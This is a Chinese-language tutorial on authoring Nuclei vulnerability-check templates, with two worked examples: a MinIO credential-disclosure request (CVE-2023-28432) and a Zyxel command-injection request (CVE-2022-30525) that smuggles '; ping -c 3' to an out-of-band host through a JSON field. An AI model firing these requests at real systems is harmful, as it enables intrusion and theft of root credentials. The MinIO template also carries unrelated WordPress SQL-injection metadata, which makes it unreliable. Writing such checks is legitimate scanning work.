Nuclei-Poc 开发 - 环境配置 & 编写流程
-
开发环境:Vscode + Yaml 插件
-
开发文档参考资料:
https://docs.nuclei.sh/template-guide/introduction
Nuclei-Poc 开发 - Yaml 语法 & 匹配提取
YAML 是一种数据序列化语言,它的基本语法规则注意如下:
- 大小写敏感
- 使用缩进表示层级关系
- 缩进时不允许使用 Tab 键,只允许使用空格。
- 缩进的空格数目不重要,只要相同层级的元素左侧对齐即可
Yaml Poc 模版:
- 编号
id - 信息
info - 请求
http file tcp等 - 匹配
matchers Interactsh - 提取
extractors
开发流程:
-
poc 模版套用修改
-
poc 创建独立编号
-
poc 填入详细信息
-
poc 提交协议流程编写
-
poc 结果匹配模式判断
-
poc 结果提取模式判断
案例 1:CVE-2023-28432 (匹配结果)
https://github.com/vulhub/vulhub/blob/master/minio/CVE-2023-28432/README.zh-cn.md
id: CVE-2023-28432
info:
name: MinIO
author: xiaodisec
severity: high
description: |
WordPress
mpact: |
Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary SQL queries on the WordPress database, potentially leading to unauthorized access, data manipulation, or privilege escalation.
remediation: Fixed in version 10.8.
reference:
- https://wpscan.com/vulnerability/6a3b6752-8d72-4ab4-9d49-b722a947d2b0
- https://wordpress.org/plugins/wp-tripadvisor-review-slider/
- https://nvd.nist.gov/vuln/detail/CVE-2023-0261
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-28432
cwe-id: CWE-89
epss-score: 0.3054
epss-percentile: 0.96509
cpe: cpe:2.3:a:ljapps:wp_tripadvisor_review_slider:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: ljapps
product: wp_tripadvisor_review_slider
framework: wordpress
tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps
http:
- raw:
- |
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
matchers:
- type: word
words:
- 'MINIO_ROOT_USER'
- 'MINIO_ROOT_PASSWORD'
condition: and案例 2:CVE-2022-30525(匹配交互)
blog.csdn.net/weixin_43080961/article/details/124776553
id: CVE-2022-30525
info:
name: xiaodisec
author: remote
severity: high
tags: CVE-2022-30525
reference: CVE-2022-30525
requests:
- raw:
- |
POST /ztp/cgi-bin/handler HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=utf-8
{"command": "setWanPortSt","proto": "dhcp","port": "1270","vlan_tagged": "1270","vlanid": "1270","mtu": "{{exploit_payload}}","data":""}
payloads:
exploit_payload:
- "; ping -c 3 {{interactsh-url}};"
attack: pitchfork
matchers:
- type: word
part: interactsh_protocol
name: dns
words:
- "dns"Nuclei-Poc 开发 - BurpSuite 模版生成插件
https://github.com/projectdiscovery/nuclei-burp-plugin
- 导入或商店安装
- 配置插件路径信息
- 数据包选择生成模版
- 修改模版信息测试提交